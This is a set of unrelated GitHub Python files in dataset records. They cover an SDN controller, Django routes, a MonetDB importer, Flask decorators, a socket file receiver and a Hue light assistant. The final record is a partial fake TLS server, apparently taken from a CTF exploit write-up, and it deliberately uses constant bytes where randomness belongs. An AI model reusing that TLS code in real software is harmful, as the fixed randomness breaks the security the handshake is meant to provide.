success=datapath.send_msg(out)\n print \"icmp packet out={}\".format(success)\n\n '''\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n return\n # If you hit this you might want to increase\n # the \"miss_send_length\" of your switch\n if ev.msg.msg_len < ev.msg.total_len:\n self.logger.debug(\"packet truncated: only %s of %s bytes\",\n ev.msg.msg_len, ev.msg.total_len)\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n in_port = msg.match['in_port']\n\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocols(ethernet.ethernet)[0]\n\n \n if eth.ethertype == ether_types.ETH_TYPE_LLDP:\n # ignore lldp packet\n return\n \n '''\n elif eth.ethertype == ether_types.ETH_TYPE_IP: \n ipp = pkt.get_protocol(ipv4.ipv4)\n print \"IP packet. 
Source={} Destination={} Protocol={}\".format(ipp.src, ipp.dst, ipp.proto)\n\n if ipp.proto == 6:\n tcpp = pkt.get_protocol(tcp.tcp)\n if tcpp.has_flags(tcp.TCP_SYN):\n print \"SYN Received from {} at {}\".format(ipp.src, datapath.id)\n if self.ingress_icmp_rule_installed==False:\n actions_controller_icmp = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER)]\n match_icmp = parser.OFPMatch(eth_type=0x0800,ip_proto=1)\n self.add_flow(datapath, 3, match_icmp, actions_controller_icmp)\n self.ingress_icmp_rule_installed = True\n out_port = self.mac_to_port[datapath.id][eth.dst]\n self.send_icmp(datapath, out_port, in_port, eth, ipp)#in_port, out_port\n elif ipp.proto == 1:\n if self.ingress_icmp_rule_installed==True:\n icmpp = pkt.get_protocol(icmp.icmp)\n rtt_info=str(icmpp.data.data)\n rtt_info_fields=rtt_info.split(\",\")\n rtt=time.time()-float(rtt_info_fields[1])\n print \"RTT calculated. Target = {}, send_time = {}, rtt={}ms\".format(rtt_info_fields[0], rtt_info_fields[1], rtt*1000)\n return\n '''\n\n if self.am_deleting==1:\n return\n\n dst = eth.dst\n src = eth.src\n\n dpid = datapath.id\n\n if dpid in [1,6] and in_port==3-self.selected_path:\n #print(\"ignoring packet\")\n return\n \n self.mac_to_port.setdefault(dpid, {})\n\n #self.logger.info(\"packet in %s %s %s %s\", dpid, src, dst, in_port)\n\n # learn a mac address to avoid FLOOD next time.\n self.mac_to_port[dpid][src] = in_port\n\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n\n actions = [parser.OFPActionOutput(out_port)]\n actions_controller = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER)]\n #match_tcp = parser.OFPMatch(eth_type=0x0800,ip_proto=6)\n\n #print(\"====PACKETIN RECEIVED===== {}, {}, {}\".format(datapath.id, src, dst))\n \n # install a flow to avoid packet_in next time\n if out_port != ofproto.OFPP_FLOOD:\n match = parser.OFPMatch(in_port=in_port, eth_dst=dst, eth_src=src)\n\n #self.add_flow(datapath, 2, match_tcp, actions_controller)\n\n # verify if we have a valid buffer_id, if yes avoid to send both\n # flow_mod & packet_out\n idle_=0\n hard_=0\n if msg.buffer_id != ofproto.OFP_NO_BUFFER:\n self.add_flow(datapath, 1, match, actions, msg.buffer_id, idle_timeout=idle_, hard_timeout=hard_, flags=ofproto.OFPFF_SEND_FLOW_REM, cookie=1)\n return\n else:\n self.add_flow(datapath, 1, match, actions, idle_timeout=idle_, hard_timeout=hard_, flags=ofproto.OFPFF_SEND_FLOW_REM, cookie=1)\n\n if datapath.id not in self.installed_flows:\n self.installed_flows[datapath.id]=[]\n\n self.installed_flows[datapath.id]=datapath\n\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n\n out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,\n in_port=in_port, actions=actions, data=data)\n success=datapath.send_msg(out)\n #print(\"Flow rule installed successfully = {}\".format(success))\n","repo_name":"kubad565/sdn-project","sub_path":"automatic.py","file_name":"automatic.py","file_ext":"py","file_size_in_byte":18607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"37128023404","text":"#!/usr/bin/env python3\n\n\ndef close(x, y, z):\n dif = abs(x-y)\n if dif < z:\n return True\n else:\n return False\n\n\nif __name__ == \"__main__\":\n a = close(1, 2, 0.5)\n print(a)\n b = close(1, 2, 3)\n 
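# The packet-in handler above is the classic learning-switch core: record
# which port a source MAC arrived on, then forward to the destination's
# learned port or flood. The table logic alone, with -1 standing in for
# OFPP_FLOOD:
mac_to_port = {}

def learn_and_lookup(dpid, src, dst, in_port, flood=-1):
    table = mac_to_port.setdefault(dpid, {})
    table[src] = in_port          # learn where src lives
    return table.get(dst, flood)  # known destination port, else flood

assert learn_and_lookup(1, 'aa', 'bb', in_port=3) == -1  # 'bb' unknown yet
assert learn_and_lookup(1, 'bb', 'aa', in_port=7) == 3   # 'aa' was learned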
print(b)\n\n\n\n","repo_name":"hayc09/automatic-engine","sub_path":"Lab1/close.py","file_name":"close.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74335688057","text":"from django.urls import path, include\n\nfrom main import views\nfrom main.views import ProductDetailsView, ProductsListView, CreateProductView, UpdateProductView, DeleteProductView, \\\n SearchResultsView\n\nurlpatterns = [\n path('search/', SearchResultsView.as_view(), name='search-results'),\n path('create/', CreateProductView.as_view(), name='create-product'),\n path('<slug:category_id>/', ProductsListView.as_view(), name='products-list'),\n path('details/<int:pk>/', ProductDetailsView.as_view(), name='product-details'),\n path('update/<int:pk>/', UpdateProductView.as_view(), name='update-product'),\n path('delete/<int:pk>/', DeleteProductView.as_view(), name='delete-product'),\n\n\n]","repo_name":"TimJo94/shop","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12012475166","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nFunc:\n- Connect MonetDB Database, using the default 'demo'\n- Import Data.\n\nRef:\nhttps://www.monetdb.org/Documentation/ClientInterfaces/PythonLibrary\nhttps://pymonetdb.readthedocs.io/en/latest/\n\nUsage:\n> python monetdb.py --input=YOUR DATA PATH --tbname='YOUR TABLE NAME'\ne.g.,\n> python monetdb.py --input=../data/bim/SciThe/classmodel.xyz --tbname=SciThe \n\n@date: June 25, 2020\n@author: Wesley\n\n\"\"\"\n\n# Import necessary packages and modules.\nfrom __future__ import print_function\nfrom __future__ import division\nimport os\nimport sys\nimport argparse\nimport pymonetdb\nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom platform import python_version\n\nprint('Python Version: ', python_version())\n\n\ndef create_db(tbname):\n\t'''\n\t'''\n\tconn = None\n\ttry:\n\t\t# print('Connecting to the MonetDB database ...')\n\t\t# set up a connection. 
arguments below are the defaults\n\t\tconn = pymonetdb.connect(username=\"monetdb\", password=\"monetdb\", hostname=\"localhost\", database=\"demo\")\n\t\t# create a cursor\n\t\tcur = conn.cursor()\n\t\t# create a table\n\t\tcur.execute('CREATE TABLE IF NOT EXISTS '+ tbname + \n\t\t\t' (voxid SERIAL, x INTEGER NOT NULL, y INTEGER NOT NULL, z INTEGER NOT NULL, objID INTEGER);')\n\n\t\t# close connection\n\t\tcur.close()\n\t\tconn.commit()\n\texcept (Exception, pymonetdb.exceptions.DatabaseError) as error:\n\t\tprint(error)\n\tfinally:\n\t\treturn conn\n\n\ndef write_db(conn, tbname, file):\n\t'''\n\t'''\n\tif conn is not None:\n\t\ttry:\n\t\t\tcur = conn.cursor()\n\t\t\t# Method-I: Read .xyz file line by line\n\t\t\t'''\n\t\t\twith open(file, mode='r', encoding='utf-8') as f:\n\t\t\t\twhile(True):\n\t\t\t\t\tline = f.readline().strip()\n\t\t\t\t\tif not line:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tx, y, z = int(line.split()[0]), int(line.split()[1]), int(line.split()[2])\n\t\t\t\t\tobjID = int(line.split()[3])\n\t\t\t\t\tcur.execute(\"INSERT INTO \" + tbname + \n\t\t\t\t\t\t\" (x, y, z, objID) VALUES({0}, {1}, {2}, {3})\".format(\n\t\t\t\t\t\t\tint(x), int(y), int(z), int(objID)))\n\t\t\t'''\n\t\t\t# Method-II: COPY -- copy data between a file and a table\n\t\t\tcur.execute(\"COPY INTO \" + tbname + \"(x, y, z, objID) FROM '\" + file + \"'(x,y,z,objID) DELIMITERS ' ';\")\n\n\t\t\tcur.close()\n\t\t\tconn.commit()\n\t\texcept (Exception, pymonetdb.exceptions.DatabaseError) as error:\n\t\t\tprint(error)\n\t\tfinally:\n\t\t\tconn.close()\n\t\t\tprint('Database connection closed.')\n\n\nif __name__ == '__main__':\n\tprint('********** Initializing ArgumentParser and related arguments **********')\n\tparser = argparse.ArgumentParser(description='Argument list', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('--input', help='directory for input data')\n\tparser.add_argument('--tbname', help='table name')\n\targs = parser.parse_args(sys.argv[1:])\n\n\tprint('********** Creating Database **********')\n\tconn = create_db(args.tbname)\n\n\tprint('********** Writing Database **********')\n\twrite_db(conn, args.tbname, args.input)\n\n","repo_name":"weil0819/Vox3DMod","sub_path":"src/monetdb.py","file_name":"monetdb.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"24273774835","text":"import googleapiclient.discovery\nfrom TransferObjects import PlaylistData\nimport ExceptionPackage.TimeOutCustomException as excepCust\nimport requests\nfrom io import BytesIO\nimport url_parser\n\nclass YoutubeAPI:\n\n def getYoutubeObject(self):\n DEVELOPER_KEY = \"\"\n YOUTUBE_API_SERVICE_NAME = \"youtube\"\n YOUTUBE_API_VERSION = \"v3\"\n return googleapiclient.discovery.build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,\n developerKey=DEVELOPER_KEY)\n\n def getVideoId(self, url):\n url_data = url_parser.parse_url(url)\n print('url_data:',url_data)\n try:\n return url_data['query']['v']\n except KeyError:\n raise excepCust.Invalid_Url()\n\n def getRespFromAPIVideosList(self,videoId):\n print(\"In getRespFromAPIVideosList method. 
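# The line-by-line variant above builds its INSERT with str.format, which
# breaks on quoting and invites injection; the DB-API parameter form lets
# the driver do the escaping. A sketch only -- it assumes pymonetdb
# accepts %s placeholders and that a table demo_tbl exists:
import pymonetdb

conn = pymonetdb.connect(username='monetdb', password='monetdb',
                         hostname='localhost', database='demo')
cur = conn.cursor()
cur.execute('INSERT INTO demo_tbl (x, y, z, objID) VALUES (%s, %s, %s, %s)',
            (1, 2, 3, 42))
conn.commit()
conn.close()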
Input videoId = {}\".format(videoId))\n request = self.getYoutubeObject().videos().list(part=\"snippet,contentDetails,statistics\", id=videoId)\n response = request.execute()\n print(\"response ::\", response)\n\n return response\n\n def getVideoTileAndThumbnail(self, urlInput):\n video_id = self.getVideoId(urlInput)\n response = self.getRespFromAPIVideosList(video_id)\n try:\n totalResultCount = int(response['pageInfo']['resultsPerPage'])\n if totalResultCount == 0:\n raise excepCust.Invalid_Url()\n else:\n title = response['items'][0]['snippet']['title']\n videoInfo = PlaylistData.VideoInfo(title,urlInput)\n return videoInfo\n except excepCust.Invalid_Url:\n raise excepCust.Invalid_Url()\n except Exception:\n raise excepCust.GeneralException()\n\nyouTube = YoutubeAPI()\nyouTube.getYoutubeObject()\n","repo_name":"sayanam/TimeoutApplication","sub_path":"ServiceLayer/YoutubeAPI.py","file_name":"YoutubeAPI.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"44691703447","text":"import jinja2\n\nfrom app.helper import file_helper\nfrom google.appengine.api import memcache\n\ndef load(name, data={}):\n # set the file\n file = '%s_view.html' % name\n\n # set the folder\n folder = 'app/view/'\n\n # and the path\n path = folder + file\n\n # check for the file in memcache\n view = memcache.get(path)\n\n if not view:\n # check the file exists\n if not file_helper.check(path):\n # uh oh\n raise IOError('File %s not found' % path)\n\n # set up env for the renderer\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(folder))\n\n # prepare the template\n template = env.get_template(file)\n\n # render the view\n view = template.render(data)\n\n # save it to memcache\n memcache.set(path, view)\n\n # return it\n return view","repo_name":"ahmednuaman/portfolio-space","sub_path":"app/helper/template_helper.py","file_name":"template_helper.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"43432422895","text":"\"\"\"\nIn this file we are creating an islogin decoretor \nfor finding if the user is valid or not by sending\na jwt token in headerfile of application, each time\nwhen the user is requesting an api where he is dealing\nwith some sensitive information, each time we are going to\nadd this decoretor in particular routes function.\n\"\"\"\nfrom flask_restful import abort # functions abort for sending error message\nfrom flask import request # for requesting header if jwt is present or not\nfrom functools import wraps # wrap for creating decoretor\nimport jwt # jwt for creating token\nfrom api import app\nfrom db.log import Log # importing log model \nfrom db.user import User\nfrom db.post import Post\nfrom flask_jwt_extended import get_jwt_identity\nfrom extension import db\n\n\n# creating islogin decorator\ndef islogin(f):\n @wraps(f)\n def wrap(*args, **kwargs): \n auth = request.cookies.get('auth') # checking if auth is present in request header/ cookies\n \n # if present \n if auth:\n user = jwt.decode(auth, algorithms=['HS256'], key=app.config['SECRET_KEY'])\n user_id = user['user_id']\n\n else:\n # if not present\n abort(404, message=\"you are not login\")\n return f(user_id, *args, **kwargs)\n return wrap\n \n# Use this decorator on users and posts routes for tracking activity\ndef record_logs(fun):\n @wraps(fun)\n def wrap(*args, **kwargs):\n \n try:\n result = fun(*args, **kwargs)\n 
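# getVideoId above pulls the v parameter out with the third-party
# url_parser package; the standard library covers the same lookup
# (parse_qs maps each query key to a list of values):
from urllib.parse import parse_qs, urlparse

def video_id(url):
    query = parse_qs(urlparse(url).query)
    try:
        return query['v'][0]
    except KeyError:
        raise ValueError('no v parameter in {}'.format(url))

print(video_id('https://www.youtube.com/watch?v=dQw4w9WgXcQ'))  # dQw4w9WgXcQ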
status_code = int(result[1])\n \n # If unsuccessful request then no need to store log\n if status_code != 200 and status_code != 201:\n return result\n\n # Get user details\n user_id = get_jwt_identity()\n user = User.query.filter_by(id=user_id).first()\n\n # Get url, method and post_id\n url = request.path\n method = request.method\n post_id = kwargs.get('post_id') if kwargs.get('post_id') else -1\n post = Post.query.filter_by(id = post_id).first()\n # Initialize with default values\n message = url\n post_type = ''\n\n if url == f'/api/v1/auth/register':\n if method == 'POST':\n message = f'New user added {user[\"username\"]}'\n \n if url == f'/api/v1/auth/login/':\n if method == 'POST':\n message = f'{user[\"username\"]} logged in'\n \n if url == f'/api/v1/post/{user_id}':\n if method == 'POST': \n message = f'{user[\"username\"]} posted someting'\n if url == f'/api/v1/post/{user_id}/update/{post_id}':\n if method == 'PUT': \n message = f'{user[\"username\"]} updated {post[\"title\"]}'\n \n log = Log(\n message=message, \n user_id=user_id, \n type=post_type,\n post_id= post_id,\n username=user['username'],\n )\n db.session.add(log)\n db.session.commit()\n return result\n \n except Exception as e:\n print('Error - ', str(e))\n return fun(*args, **kwargs)\n return wrap","repo_name":"M-A-D-A-R-A/beyondIRR","sub_path":"middleware/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"42552357115","text":"import socket\r\nimport os\r\n\r\nimport protocol_consts\r\nimport protocol_exceptions\r\n\r\nclass ReceivingServer:\r\n def __init__(self, dstdir: str) -> None:\r\n self._DST = dstdir\r\n\r\n self._HOST = socket.gethostbyname(socket.gethostname())\r\n print(\"In order for the sender machine to locate this machine in the local network, the following local IP will be needed:\", self._HOST)\r\n\r\n self._server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self._server_socket.bind((self._HOST, protocol_consts.PORT))\r\n self._transfer_socket = None\r\n\r\n def listen_and_connect_to_client(self) -> None:\r\n self._server_socket.listen()\r\n self._transfer_socket, client_addr = self._server_socket.accept()\r\n\r\n print(\"Sender has connected with address:\", client_addr)\r\n\r\n def handshake(self) -> None:\r\n msg = self._transfer_socket.recv(protocol_consts.BYTESIZE_MSG)\r\n if msg == protocol_consts.MSG_CLIENT_CONF:\r\n self._transfer_socket.sendall(protocol_consts.MSG_SERVER_CONF)\r\n print(\"Connection has been accepted by sender.\")\r\n else:\r\n raise protocol_exceptions.ServerCouldNotConfirmError(\"The receiver did not confirm the connection.\")\r\n\r\n def _receive_file(self) -> None:\r\n # File path length\r\n pathlen_bytes = self._transfer_socket.recv(protocol_consts.BYTESIZE_PATHLEN)\r\n pathlen = int.from_bytes(pathlen_bytes, \"big\")\r\n self._transfer_socket.sendall(protocol_consts.MSG_SERVER_CONF)\r\n\r\n # File path\r\n noprefixpathname_bytes = self._transfer_socket.recv(pathlen)\r\n noprefixpathname = ''.join(map(chr, noprefixpathname_bytes))\r\n self._transfer_socket.sendall(protocol_consts.MSG_SERVER_CONF)\r\n\r\n # File size\r\n filesize_bytes = self._transfer_socket.recv(protocol_consts.BYTESIZE_FILESIZE)\r\n filesize = int.from_bytes(filesize_bytes, \"big\")\r\n self._transfer_socket.sendall(protocol_consts.MSG_SERVER_CONF)\r\n\r\n # File data\r\n filedata_bytes = self._transfer_socket.recv(filesize)\r\n 
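# Both decorators above share one shape: wrap the view, run the check or
# the logging, then call through. The skeleton with functools.wraps, which
# keeps the wrapped function's name and docstring (the hard-coded user_id
# stands in for the JWT/cookie lookup):
from functools import wraps

def islogin(f):
    @wraps(f)
    def wrap(*args, **kwargs):
        user_id = 42  # stand-in for decoding the auth cookie
        return f(user_id, *args, **kwargs)  # user_id is prepended, as above
    return wrap

@islogin
def profile(user_id):
    """Return the profile for user_id."""
    return user_id

assert profile() == 42
assert profile.__name__ == 'profile'  # preserved by @wraps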
self._transfer_socket.sendall(protocol_consts.MSG_SERVER_CONF)\r\n\r\n # Construct local path with self._DST prefix.\r\n fulldstpath = os.path.join(self._DST, noprefixpathname)\r\n print(\"Received file:\", fulldstpath)\r\n\r\n # Make the directories needed in order to write the file and send it.\r\n os.makedirs(os.path.dirname(fulldstpath), exist_ok=True)\r\n\r\n with open(fulldstpath, \"wb\") as dstfile:\r\n dstfile.write(filedata_bytes)\r\n\r\n def receive_dir(self) -> None:\r\n nfiles_bytes = self._transfer_socket.recv(protocol_consts.BYTESIZE_NFILES)\r\n self._transfer_socket.sendall(protocol_consts.MSG_SERVER_CONF)\r\n\r\n for _ in range(int.from_bytes(nfiles_bytes, \"big\")):\r\n self._receive_file()\r\n\r\n def __del__(self) -> None:\r\n self._transfer_socket.close()\r\n self._server_socket.close()\r\n","repo_name":"SeanJxie/PyWirelessTransfer","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"22"} +{"seq_id":"35536291130","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 20 17:55:23 2019\n\n@author: spidey\n\"\"\"\n\nfrom phue import Bridge\nfrom gtts import gTTS\nimport speech_recognition as sr\nfrom tempfile import TemporaryFile\nfrom pygame import mixer\nimport pyautogui\nimport re\nfrom random import randint\nimport webbrowser\nfrom time import sleep\n\ndef myCommand():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n sleep(2)\n print('Ready...')\n r.pause_threshold = 1\n r.adjust_for_ambient_noise(source, duration=1)\n audio = r.listen(source)\n try:\n command = r.recognize_google(audio).lower()\n print('You said: ' + command + '\\n')\n\n #loop back to continue to listen for commands if unrecognizable speech is received\n except sr.UnknownValueError:\n print('Your last command couldn\\'t be heard')\n command = myCommand();\n\n return command\n\ndef assistant(command):\n if 'set the mood' in command:\n lights('romantic')\n elif 'sad' in command:\n lights('sad')\n elif 'heart broken' in command:\n lights('break')\n elif 'happy' in command:\n lights('happy')\n elif 'let there be light' in command:\n lights('up')\n elif 'see you' in command:\n lights('down')\n \ndef lights(action):\n b = Bridge('10.111.14.17')\n light_names = b.get_light_objects('name')\n if action=='up':\n light_names['Hue color lamp 1'].on = True\n light_names['Hue color lamp 1'].hue = 40000\n light_names['Hue color lamp 1'].saturation = 10\n if action=='down':\n command1 = {'transitiontime' : 100, 'on' : False}\n#b.set_light(1, command1)\n#time.sleep(1)\n#command2={'transitiontime' : 100, 'on' : True,'hue' :40000, 'bri':50}\n b.set_light(1, command1)\n print('done')\n if action=='happy':\n url='https://www.youtube.com/watch?v=ApXoWvfEYVU'\n webbrowser.open(url)\n sleep(1)\n pyautogui.click(733, 237)\n i=0\n while i<4:\n hues=[45000,40000,35000,30000]\n command={'transitiontime' : 100, 'on' : True,'hue' :hues[i], 'bri':50}\n b.set_light(1,command)\n sleep(10)\n i+=1\n if action=='sad':\n url='https://www.youtube.com/watch?v=au2n7VVGv_c'\n webbrowser.open(url)\n sleep(1)\n pyautogui.click(733, 237)\n i=0\n while i<4:\n hues=[40000,44000,40000,44000]\n command={'transitiontime' : 100, 'on' : True,'hue' :hues[i], 'bri':50}\n b.set_light(1,command)\n sleep(10)\n i+=1\n if action=='romantic':\n url='https://www.youtube.com/watch?v=2Vv-BfVoq4g&t=20s'\n webbrowser.open(url)\n sleep(1)\n pyautogui.click(733, 237)\n i=0\n while i<4:\n 
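# One caveat in the receiver above: on a stream socket, recv(n) may return
# fewer than n bytes, so a large file body can arrive truncated. The usual
# fix is an exact-read loop -- a sketch, not this repository's own helper:
def recv_exact(sock, n):
    chunks = []
    remaining = n
    while remaining > 0:
        chunk = sock.recv(remaining)
        if not chunk:  # peer closed before sending everything
            raise ConnectionError('{} bytes still missing'.format(remaining))
        chunks.append(chunk)
        remaining -= len(chunk)
    return b''.join(chunks)
# usage inside _receive_file: filedata_bytes = recv_exact(self._transfer_socket, filesize)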
hues=[1000,10000,55000,60000]\n command={'transitiontime' : 100, 'on' : True,'hue' :hues[i], 'bri':50}\n b.set_light(1,command)\n print('excuted',i)\n sleep(10)\n i+=1\n if action=='break':\n url='https://www.youtube.com/watch?v=J9Zjgb03FMQ'\n webbrowser.open(url)\n sleep(1)\n pyautogui.click(733, 237)\n i=0\n while i<4:\n hues=[40000,41000,42000,44000]\n command={'transitiontime' : 100, 'on' : True,'hue' :hues[i], 'bri':50}\n b.set_light(1,command)\n sleep(10)\n i+=1\nwhile True:\n try:\n assistant(myCommand())\n sleep(5)\n except KeyboardInterrupt:\n print('All done')\n # If you actually want the program to exit\n raise \n \n ","repo_name":"bathonSpidey/Nao_Personal_Assistant","sub_path":"lights.py","file_name":"lights.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32202673752","text":"import logging\nfrom gym.envs.registration import register\n\nlogger = logging.getLogger(__name__)\n\nregister(\n id='Freeciv-v0',\n entry_point='gym_freeciv_web.envs:FreecivEnv',\n #timestep_limit=1000,\n #reward_threshold=1.0,\n #nondeterministic = True,\n)\n","repo_name":"chris1869/freeciv-bot","sub_path":"src/gym_freeciv_web/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"22"} +{"seq_id":"70076765497","text":"import re\r\nwhile True:\r\n s = input()\r\n if s == \"end\":break\r\n case1 = len(re.findall(\"[aeiou]\", s)) != 0 # 모음의 유무 확인\r\n case2 = len(re.findall(\"[aeiou]{3}|[^aeiou]{3}\", s)) == 0 # 모음 or 자음의 3번 연속 유무 확인\r\n case3 = len(re.findall(\"([a-df-np-z])\\\\1\", s)) == 0 # e와 o의 2번 반복 제외 반복 유무 확인\r\n\r\n if case1 and case2 and case3:\r\n print(f\"<{s}> is acceptable.\")\r\n else:\r\n print(f\"<{s}> is not acceptable.\")\r\n","repo_name":"gyocheol/baekjoon","sub_path":"백준/Silver/4659. 
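# The password checker above encodes three pronounceability rules as
# regexes; tracing one sample word shows what each findall contributes:
import re

word = 'tree'
has_vowel = bool(re.findall('[aeiou]', word))                  # must be True
has_triple = bool(re.findall('[aeiou]{3}|[^aeiou]{3}', word))  # must be False
bad_double = bool(re.findall(r'([a-df-np-z])\1', word))        # ee/oo exempt
print(has_vowel, has_triple, bad_double)  # True False False -> acceptable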
비밀번호 발음하기/비밀번호 발음하기.py","file_name":"비밀번호 발음하기.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"1185601854","text":"# Blatantly copied from https://github.com/dfyz/ctf-writeups/blob/master/hxp-2020/security%20scanner/fake_git.py\nimport argparse\nimport base64\nimport hashlib\nimport hmac\nimport re\nimport socket\nimport struct\nimport time\nfrom Crypto.Cipher import AES\nfrom Crypto.PublicKey import RSA\nfrom dataclasses import dataclass\nfrom pathlib import Path\nimport threading\n\n\n# RFC 5246, section 5\ndef prf(secret, label, seed, length):\n def hmac_sha256(key, msg):\n return hmac.digest(key, msg, hashlib.sha256)\n\n seed = label + seed\n\n result = b''\n cur_a = seed\n while len(result) < length:\n cur_a = hmac_sha256(secret, cur_a)\n result += hmac_sha256(secret, cur_a + seed)\n return result[:length]\n\n\ndef to_ad(seq_num, tls_type, tls_version, tls_len):\n return struct.pack('>QBHH', seq_num, tls_type, tls_version, tls_len)\n\n# Chosen by fair dice roll, guaranteed to be random.\ndef get_random_bytes(length):\n return b'A' * length\n\nclass TLS:\n # in bytes (i.e., this is 4096 bits)\n KEY_LENGTH = 512\n PKCS_PREFIX = b'\\x00\\x02'\n\n # TLS 1.2\n VERSION = 0x0303\n # TLS_RSA_WITH_AES_128_GCM_SHA256, because we don't care to support the full DH exchange.\n CIPHER_SUITE = 0x9c\n\n CHANGE_CIPHER_SPEC_CONTENT_TYPE = 0x14\n ALERT_CONTENT_TYPE = 0x15\n HANDSHAKE_CONTENT_TYPE = 0x16\n DATA_CONTENT_TYPE = 0x17\n\n FINISHED_HANDSHAKE_TYPE = 0x14\n\n @dataclass\n class Record:\n content_type: int\n version: int\n data: bytes\n\n @dataclass\n class HandshakeRecord:\n handshake_type: int\n data: bytes\n\n @dataclass\n class SessionKeys:\n master_secret: bytes\n client_key: bytes\n server_key: bytes\n client_salt: bytes\n server_salt: bytes\n\n def __init__(self, socket, priv_key, certs, session_id):\n self.socket = socket\n self.priv_key = priv_key\n self.certs = certs\n # Chosen by a fair dice roll.\n self.server_random = get_random_bytes(32)\n self.session_id = session_id\n\n self.client_seq_num = 0\n self.server_seq_num = 0\n self.handshake_log = b''\n\n self.session_keys = None\n self._shake_hands()\n\n def _read_record(self, expected_type):\n header = self.socket.recv(5)\n content_type, version, length = struct.unpack('>BHH', header)\n data = self.socket.recv(length)\n assert content_type == expected_type, f'Bad content type: got {content_type}, expected {expected_type}'\n return TLS.Record(content_type, version, data)\n\n def _write_record(self, record):\n payload = struct.pack('>BHH', record.content_type, record.version, len(record.data)) + record.data\n self.socket.send(payload)\n\n def _read_handshake_record(self, expected_type, decrypt=False):\n record = self._read_record(TLS.HANDSHAKE_CONTENT_TYPE)\n payload = record.data\n if decrypt:\n payload = self._decrypt(payload, TLS.HANDSHAKE_CONTENT_TYPE, record.version)\n self.handshake_log += payload\n header_size = 4\n header, *_ = struct.unpack('>I', payload[:header_size])\n handshake_type = header >> 24\n assert handshake_type == expected_type, f'Bad handshake type: got {handshake_type}, expected {expected_type}'\n length = header & 0xFF_FF_FF\n return TLS.HandshakeRecord(handshake_type, payload[header_size:header_size + length])\n\n def _write_handshake_record(self, record, encrypt=False):\n header = (record.handshake_type << 24) | len(record.data)\n payload = struct.pack('>I', header) + record.data\n if encrypt:\n payload 
= self._encrypt(payload, TLS.HANDSHAKE_CONTENT_TYPE)\n self.handshake_log += payload\n self._write_record(TLS.Record(TLS.HANDSHAKE_CONTENT_TYPE, TLS.VERSION, payload))\n\n def _get_server_hello(self):\n return b''.join([\n struct.pack('>H', TLS.VERSION),\n self.server_random,\n struct.pack('B', len(self.session_id)),\n self.session_id,\n # No compression, no extension\n struct.pack('>HBH', TLS.CIPHER_SUITE, 0, 0),\n ])\n\n def _get_certificate(self):\n def int16_to_int24_bytes(x):\n return b'\\x00' + struct.pack('>H', x)\n\n packed_certs = b''.join([\n int16_to_int24_bytes(len(cert)) + cert\n for cert in self.certs\n ])\n\n return int16_to_int24_bytes(len(packed_certs)) + packed_certs\n\n def derive_keys(self, encrypted_premaster_secret, client_random):\n assert len(encrypted_premaster_secret) == TLS.KEY_LENGTH\n encrypted_premaster_secret = int.from_bytes(encrypted_premaster_secret, byteorder='big')\n premaster_secret = pow(encrypted_premaster_secret, self.priv_key.d, self.priv_key.n).to_bytes(TLS.KEY_LENGTH, byteorder='big')\n\n assert premaster_secret.startswith(TLS.PKCS_PREFIX)\n premaster_secret = premaster_secret[premaster_secret.find(b'\\x00', len(TLS.PKCS_PREFIX)) + 1:]\n assert len(premaster_secret) == 48\n\n master_secret = prf(premaster_secret, b'master secret', client_random + self.server_random, 48)\n\n enc_key_length, fixed_iv_length = 16, 4\n expanded_key_length = 2 * (enc_key_length + fixed_iv_length)\n key_block = prf(master_secret, b'key expansion', self.server_random + client_random, expanded_key_length)\n return TLS.SessionKeys(\n master_secret=master_secret,\n client_key=key_block[:enc_key_length],\n server_key=key_block[enc_key_length:2 * enc_key_length],\n client_salt=key_block[2 * enc_key_length:2 * enc_key_length + fixed_iv_length],\n server_salt=key_block[2 * enc_key_length + fixed_iv_length:],\n )\n\n 